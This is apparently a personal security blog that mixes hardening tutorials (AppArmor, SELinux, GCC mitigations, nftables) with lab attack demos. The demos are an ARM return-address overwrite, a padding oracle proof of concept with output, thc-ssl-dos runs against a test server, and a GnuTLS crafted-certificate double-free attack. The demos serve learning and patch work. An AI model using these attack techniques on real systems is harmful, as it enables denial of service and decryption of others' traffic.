shawn@debian-armhf:~/citypw-SCFE/security/overwrite_ret_addr_armv7$ ./victim `python -c 'print "A" * 16 + "\x35\x84"'`
The address of func test(): 0x8405, func fuck_me(): 0x8435
AAAAAAAAAAAAAAAA5�
being hacked
Segmentation fault

===========================

I guess the exploit of ARM would be much different to x86. I've heard of ret2libc won't work on ARM. That's really interesting and worth to figure it out. Obviously, this Phrack paper and some manuals should be added into my must-read list.

Wednesday, October 23, 2013

Say "hello nftables" on Debian 7 GNU/Linux

Nftables is the 4th generation packet filter engine for linux kernel and it will be merged into kernel 3.13. I haven't play with netfilter for a while. When I saw Nftables a couple of days ago, I think there's something( iteches?) I need to scratch;-) Let's try to say "Hi" to nftables.

OS: Debian 7 GNU/Linux. Grab the small version of iso here.

After the installation. Some packages are needed to be install also:
#apt-get install git vim libgmp-dev libreadline-dev libtool autoconf gcc make pkg-config libjansson-dev libmxml-dev flex bison libncurses5-dev kernel-package

Firstly, you need to compile two libraries: libmnl and libnftables
git clone git://git.netfilter.org/libmnl
cd libmnl/
./autogen.sh
./configure
make
sudo make install
sudo ldconfig

git://git.netfilter.org/libnftables
cd libnftables/
./autogen.sh
./configure --with-json-parsing --with-xml-parsing
make
sudo make install
sudo ldconfig

Then, compile/install the userspace tool( nft):

git clone git://git.netfilter.org/nftables
cd nftables
./autogen.sh
ac_cv_func_malloc_0_nonnull=yes ac_cv_func_realloc_0_nonnull=yes  ./configure
make
sudo make install
sudo ldconfig

Well, because linux-3.13 is not release yet. So we need to grab the source code from nftables dev tree:

git clone git://git.kernel.org/pub/scm/linux/kernel/git/pablo/nftables.git linux
cp /boot/config-3.2.0-4-686-pae .config
make menuconfig( select these NF_TABLES options)
make -j 3 deb-pkg
cd ../
sudo dpkg -i *.deb

Reboot your machine. Let's try some policies. Thanks to the author whoever wrote this HOWTO. Nftables policy is seem easy to write. But I'm still not get used to the new style since I even don't know how to delete a table. It always saying the device is BUSY or something like that. WTH~ I checked the commits, it should be a feature though. I think the policy converter tool between iptables and nftables, that is necessary. Otherwise, it'd be barries to those old school iptables users/admin/developers.

Thursday, October 17, 2013

RTL-SDR version of "Hello World"

Telco sec is always a fascinating field I want to get involve with. Why? Because those old school Phrack guys has playing both computer sec and telco sec. I missed the golden age of Phrack that was bothered me for a while. It won't stop me to dive into any field I want now. If what makes you tick is only for profit( money?), come on, you probably won't be having qualify to mention the term "underground spirit";-)

About 1 month ago, a friend( Can't list his/her name here-_-) sent me a slide about Femtocell hacking and asked if I may have interest in it. Of course, I have. But...well, there's always a fucking "but", isn't it?...femtocell is a little bit expensive and I was busy with other stuff at the time. Then I even forgot this shit until a great hacker( Can't list his/her name too-_-) mentioned about there are cheap devices I could buy some for learning telco stuff: RTL-SDR. Everything you need to know is already in this website. I bought tuner, antenna, freq counter, SMA-MCX converter,etc... then I was catching the shit in the air. FM at first, MODE-S transmission and GSM sniffing. What I have learned/done in past two weeks is really shocking my mind and it is definitely actived a bunch of neurons in my brain. This is an awesome field. I'm willing to keep up with it in the future. Hacking on GNU/Linux system calls and kernel are already a burden that's hard to carry on. Hope I can make it this time.............I really appreciate those who were/are contributed/contributing to Phrack. It's more than a technical ezine. It's about hacking spirit and philosophical ideas.

Freq counter, it probably could be detecting IR-based controller
 Catching the shit in the air( not the wire) 
Support EFF....

Saturday, September 28, 2013

Syscan Beijing 2013 slides

I've been to 5 conferences ( KCONv2, XCON2013, ISC2013, OWASP Beijing 2013, Syscan Beijing 2013) in past months. The 1st four confs were sucks. But the Syscan brought us very high quality. Don't get me wrong. Some people think these 4 conferences are good. Because they are websec guys or windows guys. As a GNU/Linux sec guy, these conferences were drugging me to sleep;-) So, I only bullshit a little bit of Syscan here. Stefan Esser's presentation "Tales from iOS 6 Exploitation" shocked us;-) A lot of people thought Stefan many pieces technique elements in the process of exploiting and each one of them are difficult to deal with. But Stefan did them all at once. That's fuc*ing super awesome. NGUYEN Anh Quynh's presentation is about ROP gadgets. I don't know much about this field. I only used some open source ROP gadgets finder once or twice. Anyway, Nguyen's talk was also blowed up my mind in the 1st day of the conference. Because his apporach is combine a llvm compiler based( dude, you are using formal logic to deal with a sec shit! Fuc*ing awesome). Plz take a look at his slide. There were other great presentations. I'll leave the download slide in the end.

Another funny story is in the almost end of Jonathan's presentation. A guy who asked him about FE. He just told us FE is nothing but a good advertising company. The real heroes are grsecurity guys: They invented the concept of ASLR, and more....btw, take a look at how grsec deal with stack canary in the hardend kernel;-)

I've packed all slides into one tar.bz file.

Can you fucking imagine that the conference organizers( I wouldn't name you motherfuckers) brought these girls( sexy? I don't think so) there? I don't care about girls in a conference. As our type of guys, we'd go out to the club/bar after conference. Unfortunately, I've already get married, which means "fuck around" part is not belong to me;-)



Sunday, July 28, 2013

Trip of Thessaloniki for osc 2013

As many people mentioned, openSUSE conference 2013 was held on July 18 to July 22 in Thessaloniki, Greece. After 20hrs in the air and waiting in the airport( for transfer), I arrived in the city of Thessaloniki about 3:00 PM on July 17. Then I went to the sea side by buy No.78. It was really nice view there. Then I took a taxi to hotel for another 12 hrs sleep;-) I visited to the white tower and Aristotle square. The great Philosopher Aristotle was born in the place where near by the city of Thessaloniki. I thought Aristotle was visit the city but I haven't find the related information yet.

It was really nice to be there. Local people are so relaxing. Much relaxer than I feel in Beijing. I love this place, I do. I met many interesting guys here, including security guys and non-security guys. Some people I met in Thessaloniki, we all love beer/sec/gaming/system of a down/ramstein/Nirvana/etc....even the background music of main conference room was Nirvana songs. Man, can you believe it? I never see it happened in China. They guys are really awesome. I also met some sec guys there. They are very skilled and talented dudes. I think I learned not less from them in few days.

This trip makes me feel my way back home. Most people doesn't like what I like in BJ. I think the whole fucking society just can't accept the type of person like me. I don't wanna change.

-------------------------------------------------------------------------
 - I love punk rock and metal, am I wrong?
 - I love Philosophy/Theology/History, am I fucking wrong?
 - I love Tri-A title computer/video games, am I fucking wrong?
 - I don't care how much money I earn( I can still feed my family, you piece of shit-_-), am I wrong? 
 - I hate the type of guys in suit who are just dead inside( walk) with their fucking boring day job, am I fucking wrong?
 ------------------------------------------------------------------------

I don't think I'm a weirdo guy. But most Chinese people I met in BJ just think that way. Don't give me wrong...I have some very awesome friends. They are Chinese dudes/ladies. But we are minorities....Greenday is always supporting us: "I wanna be the minority... I don't need your authorirty...Down with moral majority"...aha, I really love this song;-)

btw: The food in the city of Thessaloniki are really awesome, especially the seafood. And, I as a newbie had a presentation "Introduction to GNU/Linux hardening" in osc 2013.

Nice view, ha?

old good port


White Tower, or maybe we should call it "The Greece Tower"



I hadn't find the ASSOS yet;-)
 Little dude, you got a gun?
 Olympic Museum, this is the place for osc2013
  Gecko money is not a bad idea, isn't it?
 Sometime, RMS is wrong. Free speech is as free beer;-)
 July 23, people are gone
 I love this shit!@#$%^&*()
 Istanbul - In the map of Civilization IV, ring the bell?
 Awesome architecture...........

Wednesday, July 03, 2013

review the book "Profiling Hackers"

I've been reading the book of Profiling Hackers recently. For now, I only looked through a little bit. There are some topics are very interesting, so I'd like to share with you guys.
 
This book listed some questions below:

---------------------------------------------------
Why am I interested in hacking?
What are my objectives?
What am I trying to obtain through hacking?
What do I want to become?
What do I want people to think of me?
How do I want to be remembered, and what for?
---------------------------------------------------

It's the matter of the motivation of hacking. IMHO, hackers are always hacking for fun and yes, indeed( we can't deny it, right-_-) ..the profit. AlpheOne's paper's title was sort of philosophical metaphors;-) Both of motivations( fun/profit) are very important. Because if a security guy only care about one of them, it would be devastating for a person( hacker)'s life. 
 
* Fun? To some hackers, hacking is part of their life. They can't live with hacking. They are happy with joy while writing exploit...
 
* Profit? Money, of course. White hat working for commercial company. Black hat?
 
* Both White and Black are possible to sale exploit or get involve with underground business
 
 
But....as a hacker, if we: 
Only having the "fun" part. too spiritual dude... and it's hard to make the people( industry) believe you in real-life sec engineering.... Well, if the security is not your day job, that's another story;-)

Only having the "profit" part:
even worse, just like a lot of security conference runners( whores-_-) who only having one slide/topic and guffing around the world. They are a bunch of dead walks

As a real hacker, I do believe that he/she would have both of them.

And, the book also talking about the common trait of hackers, no matters of age, profession, ethnic, etc:
 
------------------------------------------------------------------------
* They usually have an above average IQ and great technical and problem-solving skills.
* They are brilliant adolescents, suffocated by an inadequate school system and by ill-prepared or poorly equipped teachers.
* They generally come from problem families.
* They rebel against all symbols or expressions of authority.
------------------------------------------------------------------------

It's true. Except the 3rd one is a little bit of vague. How to define the "problem families"? Divorce? or others? If it is mean that a family is lack of proper( btw: wth is *proper*) educate/homeschool for the kid, well...it'd be mean a huge number of families.

I'm not finish the reading. It's really great book. I never found a book which giving a way in sociology to discussion about hackers. The Hacker ethic and the spirit of Information age did some aspect of the work, but Pekka was more focus on the generic hacker( not only in computer/sec field).

Wednesday, May 22, 2013

How to Hardening your own program in GNU/Linux

Platform: OpenSUSE 12.3

Apparmor is a implementation of confinement technology. It could help you prevent those unknown attacks like 0-day vulnerability. In OpenSUSE/Ubuntu, it's very easy to install it. For the case in openSUSE 12.3, type "yast2" in terminal or use GUI software management can install the apparmor. Once you install the apparmor, you need to make the profile for the program what you want to be hardened.

Firstly, please download the example files here. Then compile the program:

shawn@linux-sk8j:~> gcc apparmor_test.c

Generate the profile for your program:
shawn@linux-sk8j:~> sudo /usr/sbin/genprof a.out

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

.........................................
.........................................
.........................................

Finished generating profile for /home/shawn/a.out.
 -----------------------------------------------------------

Then you can find the profile in /etc/apparmor.d/home.shawn.a.out. Add a few of lines into it like this:

#include

/home/shawn/a.out {
#include

   /home/shawn/a.out mr,
   /home/shawn/hello r,
   /home/shawn/world w,
   network stream,
}

Because apparmor is using whitelist-like policy in default. The above example means: only allows this program( a.out) have the read permission on file /home/shawn/hello, the write permission on file /home/shawn/world and the tcp connection. If this program have a stack-based buffer overflow issue, the attacker might want to spawn the shell by exploit it. In this case, this not gonna be happened. For further reading about apparmor profile, you might be interested in this article. Other similar implementation like SELinux and Grsecurity/PaX could achieve the same goal. SELinux is the most powerful one but the most difficult to use.

When you done the confinment hardening, there are a lot of mitigation technology you should consider. It's much easier to use. Please keep this in mind: these defensive technology are what we called "mitigation", which means the skilled hackers or attackers having the ability to exploit it. It's only the matter of time.

GCC options:
------------------------------------------------
Stack canary:
-fstack-protector, only some functions being protected
-fstack-protector-all, protect every functions in your program

Bypass method, please check Scraps of notes on remote stack overflow exploitation in Phrack Issue 67.

Heap( malloc() corruption check):
default since glibc 2.5. Please use the latest version of glibc.

Position-Independent-Executable:
-pie, it would use the advantage of ASLR which provided by kernel. Remember turn on your ASLR:


Bypass method, please check Bypassing PaX ASLR protection in Phrack Issue 59. Yes, it's an old paper but it's still worth to read.

GOT memory corruption attack hardening of ELF binaries:
-z relro, Partial RELRO
-z relro -z now, Full RELRO

Bypass method, please check The Art Of ELF: Analysis and Exploitations

String Vulnerability mitigation:
-FORTIFY_SOURCE, mitigate string format vuln

Bypass method, please check A Eulogy for Format Strings in Phrack Issue 67.

Non-executable stack:
-z nostack

Well, there are a lot of ways to bypass it.

I also made a list a few months ago. You may want to check it too. Yes, there are a lot of mitigation tech and a lot of bypass tech. Offensive and defensive technologies are like brothers. The only matter is they will fight each other to the end of the world;-)

btw: You don't need to worry about the performance hit when you turn on these mitigation tech except -fstack-protector-all. That's it!

May L0rd's hacking spirit guide us!!!

Friday, April 26, 2013

Padding Oracle Attack PoC in C

I'm a newbie on crypto field. *Unfortunately*, I need to deal with some
open source security stuff( openssl and gnutls) in my day job. Yes,
don't be so sad for me;-) I can handle it so far. I need to know more
knowledge about crypto. The best way to do it is writing xxx-attack
PoC. Then I've heard of Lucky-13 is something. Backport these patches
from upstream drives me crazy. Dude, you known~ 13 openssl upstream
commits( more than 1,700 loc modifies) were only for fix one security
issue what called Lucky-13 Thirteen which was disclosured in Feb 2013. It
was my honor to do this shitload work with very very low salary;-)
After I finished it, a very serious question came out of my mind: What
if another tens of shitload work pop up in the future but with no help
from the upstream community? Well...I have to eat the rocket by my own
hands. F0r preparing to handle such situation, I need to know the
detail of the attack. That's why I wrote the padding oracle attack
PoC( Download here).

I googled "padding oracle attack". I found 3 guys wrote their own
padding oracle attack PoC/tools in 3 differnt languages: perl, ruby
and python. I looked their code and articles. They guys are awesome!

Brian Holyfield( Perl guy) wrote this very good article and more
importantly it's easy to understand:
 
http://blog.gdssecurity.com/labs/2010/9/14/automated-padding-oracle-attacks-with-padbuster.html

Daoge( python one) is a CHiense hacker who are good at web
security:
http://hi.baidu.com/aullik5/item/49ab45de982a67db251f40f6

Ron Bowes( Ruby guy) gave us a great presentation at Shmoocon 2013. I
really thank his practical advice. He wrote two articles about padding
oracle attack. The 1st one introduce the principle and the 2nd is
giving an great example.

http://www.skullsecurity.org/blog/2013/padding-oracle-attacks-in-depth

http://www.skullsecurity.org/blog/2013/a-padding-oracle-example


Well, I'm a kind of old school guy. I decided write it in
C( not old enough as asm). This example is simple:

shawn@shawn-fortress /arsenal-4-sec-testing/libcrypto/lucky-what $ make
gcc -g -o padding_oracle_attack_poc padding_oracle_attack_poc.c -lcrypto
done
shawn@shawn-fortress /arsenal-4-sec-testing/libcrypto/lucky-what $ ./padding_oracle_attack_poc 
Ciphertext is 16 bytes: 83e10d51e6d122ca3faf089c7a924a7b
Decrypting now
205 is done: 00000000000000ce3faf089c7a924a7b
36 is done: 00000000000025cd3faf089c7a924a7b
214 is done: 0000000000d724cc3faf089c7a924a7b
230 is done: 00000000e7d023cb3faf089c7a924a7b
80 is done: 00000051e6d122ca3faf089c7a924a7b
110 is done: 00006f52e5d221c93faf089c7a924a7b
137 is done: 008a6e53e4d320c83faf089c7a924a7b
248 is done: f985615cebdc2fc73faf089c7a924a7b
The original plaintext is: "Hello World"
The one last block of plaintext: 726c6405050505050000000000000000
----> rld
 
btw: Thanks to Thomas Biege again..who is guiding me in not only one sec field... 

Wednesday, April 17, 2013

How to enable SELinux in SLES 11 SP2

I've been playing with SELinux for a few days. Once you decide to hack on SELinux, which means a very long hacking journey is begin. The 1st shit you need to do is to enable the SELinux before you dive into the details. Yes, you may already knew these great stuff could help your great SELinux hacking journey:

1, SELinux project wiki
2, The SELinux Notebook - The Foundations - 3rd Edition

The SELinux kernel module has already compiled in SUSE Linux Enterprise Server 11 SP2 but without any specific polices. OK then, I've bullshit a lot, haven't I? Please allow me bullshit a lot more;-)

Firstly, make sure SELS 11 SP2 is working well:
--------------------------------------------------------------------------------
shawn-fortress:~ # cat /etc/issue

Welcome to SUSE Linux Enterprise Server 11 SP2  (i586) - Kernel \r (\l).
-------------------------------------------------------------------------------- 

Install these packages which are needed for SELinux:
--------------------------------------------------------------------------------
zypper in libselinux1 checkpolicy libsemanage1 policycoreutils
--------------------------------------------------------------------------------


Type "yast2 bootloader" in cmdline and add:
-------------------------------------------------------------------------------- 
"security=selinux selinux=1 enforcing=0" into the kernel cmdline
--------------------------------------------------------------------------------
 In GRUB bootloader, these above 3 options are used related to SELinux.
 * security=selinux, tells the kernel to use SELinux and not AppArmor
 * selinux=1, switches on SELinux
 * enforcing=0, puts SELinux in permissive mode( only logging)


Install selinux-tools, choose "SUSE SLE-11 SP2", then "1 Click Install":
--------------------------------------------------------------------------------
http://software.opensuse.org/package/selinux-tools
--------------------------------------------------------------------------------

Install selinux-policy, choose "SUSE SLE-11 SP2", then "1 Click Install":
--------------------------------------------------------------------------------
http://software.opensuse.org/package/selinux-policy
--------------------------------------------------------------------------------

Add  selinux to existing PAM config file:
--------------------------------------------------------------------------------
pam-config -a --selinux
--------------------------------------------------------------------------------

set restorecond service to runlevel 3 in "expert mode":
--------------------------------------------------------------------------------
yast2 runlevel
--------------------------------------------------------------------------------

Finally, reboot your computer/laptop/s*!@#...... and check the SELinux status:

shawn-fortress:~ # sestatus
SELinux status:                 enabled
SELinuxfs mount:                /selinux
Current mode:                   permissive
Mode from config file:          permissive
Policy version:                 26
Policy from config file:        refpolicy-standard

See, it's working!

Thanks to Thomas Biege who is guiding me on this journey! Thomas's article "SELinux on openSUSE 11.1" helped me to understand the config of SELinux in big picture.

May L0rd's hacking spirit guide us!

Monday, April 01, 2013

Vuln assessment for PALADIN forensic tools free version

I went to the China Mac Forensic Conference last week. This was my 1st time I attended a security con about forensic. Some of security guys gave us a few free speech and it's all about forensic. In forenisc field, the only stuff I've know its Lynis which was written by Michael Boelen. They were talking about forensic stuff on Mac/iOS platforms in the morning. That made me a little boring. But what else can I blame about? This conference is called Mac-Forensic*. Fortunately, I found something very interesting at the afternoon. A company named SUMURI providing a forensic solution which based on GNU/Linux. This GNU/Linux distro is called "PALADIN". I got a free Live-DVD and booted it up in scene. Well, I was fuc* exicting because I got tens of shitloads of information about Mac/iOS in that day. Now I had something I'm familiar with: GNU/Linux. I found some potential risks for PALADIN GNU/Linux distro. I've already notified them. Hope they could spend more time on sec stuff.

OK. When PALADIN booted up, you can see the ubuntu-like( Unity?) GUI:



PALADIN provides a lot of open source forensic tools:

In the free version, the only closed-tool is "PALADIN Toolbox" which can be found in the Desktop and the binary file is located in /usr/bin/toolbox. This binary is using many free/open source libraries. The 1st potential issue is violation of free/open source licenses. Then I asked Steve Whalen "are you sure that toolbox has no violation of the free/open source licenses" in the scene. His answer is pretty sure that the toolbox won't be violated any free/open source licenses:

Then, I took a few mins to investigation on the binary. Firstly, the entry address:

And, it doesn't have any anti-debugging features( my examples) in it. If your asset is a closed-source binary. You should do anti-debug. A skilled reverse engineer is able to find the security issue by reversing the binary in very *short* time:

ASLR is turned on. "2" is very good, which means the kernel do the randomize for stack and heap separately. AFAIK, the issue is the ASLR only work with PIE.

Lucky Thirteen Attack is a big issue recently. The current openssl version is affected.

Well, this is it. I've done the investigation when a guy told me it's time to smb break. I'm very happy to see the company like SUMURI brings GNU/Linux into the forensic field.

Thursday, March 28, 2013

Openssl renegotiation DoS attack is still an issue

Openssl renegotiate would causes DoS attack was disclosured in 2011,then THC released their DoS attack tools. This issue what we called CVE-2011-1473 until now the openssl upstream community doesn't give any solution.  So, it seems they've been leaving this issue to the application developers( suck this shit in mind), such as Apache2 provide a optional config that you can disable renegotiation.

Let's see what Apache2 server would do in most cases:

shawn@fortress / $ openssl s_client -connect build.opensuse.org:443

..............................

..............................

Timeout   : 300 (sec)  

Verify return code: 20 (unable to get local issuer certificate) ---

R   // Press R, then enter

RENEGOTIATING 140722018514592:error:1409E0E5:SSL routines:SSL3_WRITE_BYTES:ssl handshake failure:s3_pkt.c:592:


According to Vincent Bernat, a server will require 15 times the processing power of a client, which means an Intel i7 CPU laptop can kick a bunch of servers's ass. Plz take a look at my test data:

Test environment:SLES 11 SP2 , assigned 2 cores + 1GB memory in virtual machine

Case I:

Server: openssl s_server -key server-key.pem

Client: thc-ssl-dos 192.168.0.1 4433 --accept -l 10000

The worst case:

Cpu0 : 1.3%us, 1.7%sy, 0.0%ni, 97.0%id, 0.0%wa, 0.0%hi, 0.0%si, 0.0%st

Cpu1 : 53.1%us, 5.1%sy, 0.0%ni, 37.1%id, 0.0%wa, 0.0%hi, 0.7%si, 0.0%st

Case II:  Vincent Bernat provided us an open source hardening/mitigation solution, which add some rate-limit/fixed hex data for filtering on the netfilter.

#sh iptables.sh

#iptables -A INPUT -d 192.168.0.1 -p tcp --dport 4433 -j LIMIT_RENEGOCIATION

Server: openssl s_server -key server-key.pem

Client: thc-ssl-dos 192.168.0.1 4433 --accept -l 10000

The worst case:

Cpu0 : 0.0%us, 0.0%sy, 0.0%ni,100.0%id, 0.0%wa, 0.0%hi, 0.0%si, 0.0%st

Cpu1 : 0.0%us, 0.7%sy, 0.0%ni, 99.3%id, 0.0%wa, 0.0%hi, 0.0%si, 0.0%st

Well done, Vincent! Your solution works. But I'm not sure this may cause the side-effect. Vincent added some fixed hex data as filtering policy on the netfilter. What if the same hex data occurs? Is false positive possible?

Wednesday, March 20, 2013

possible ways to exploit CVE-2012-1663

CVE-2013-1663 is a possible remote DOS attack issue. This issue has
been fixed in >=GNUTLS-3.0.14. I hacked on it for hours and figure out
a few prerequisites could make it vulnerable:

=============================
REQUIRED:

 - prior to GNUTLS 3.0.14
 - crafted certificate

=============================
Attacking SCENES

 - a client import a crafted cert file for sending req to server( CA?)

 - a "server" import a crafted cert file for sending req to other
   server( CA?)

---> With high frequency uses above manipulations

Stand on the client side, the attacker should try to construct a
crafted certificate for triggering the below function fails:

ret = gnutls_pubkey_import_x509(pcert->pubkey, crt, 0);
  if (ret < 0)
    {
      gnutls_pubkey_deinit(pcert->pubkey);
      /* pcert->pubkey should be NULL now */
      ret = gnutls_assert_val(ret);
      goto cleanup;
    }

I made up two crafted cert files( client.pem, client2.pem) seems would
trigger the double free issue in client's side.

Warning: Don't try it on your host machine because it would cost too
much memory then makes your machine very slow. I highly recommend you guys use vm for testing.

shawn@sl13:~/gnutls_compile_uses/CVE-2012-1663$ ./ex-serv-x509
processing server set to null?
Server ready. Listening to port '5556'.

shawn@sl13:~/gnutls_compile_uses/CVE-2012-1663$ ./attack.sh
................
.................
...................

Another terminal: killall client

Test platform: Slackware 13.37 + GNUTLS-3.0.13

Monday, March 11, 2013

How to compile GNUTLS-3.1.9 on Slackware 13.37

Before you dive into the detail source code of GNUTLS, you'd better compile/install it manually. But you known, hacker is always one of laziest type of person around the world. We want everything automatically. We did functional testing at first place, then we want to tranform its boring shit to automation testing. Even in security field, there are a bunch of guys( not lamer ones;-)) are trying to make the pentest/exploit shits automatically. I used to be an open source security QA guy and tried some automation tools( like ctcs) to satisfy my "lazy" requirement. Then I've starting maintain some security packages and fixing/backporting CVEs issues for "some" GNU/Linux distro. I've been doing this type of work for months but haven't compile the packages I'm maintaining with. What a shame;-)

I wrote a simple script today and it will help if you wanna compile GNUTLS in manual:

./get_repos.sh
Usage: [ Compile packages automatically: yes/no]

Type:
./get_repos.sh no  ===> only download the packages without compiliation
./get_repos.sh yes ===> download the packages then compiliation

If you choose "yes", you can check if it's really work:
Open two terminals: T1, T2

T1: Run the anonymous server with TLS
john@sl13:~/gnutls_uses$ ./anonymous_serv
Server ready. Listening to port '5556'.

- connection from 127.0.0.1, port 59923
- Handshake was completed

- Peer has closed the GnuTLS connection

T2: Run the client
john@sl13:~/gnutls_uses$ ./anonymous_cli
- Handshake was completed
- Received 18 bytes: GET / HTTP/1.0

That's it! Have fun with it!

May L0rd's hacking spirit guide us!!!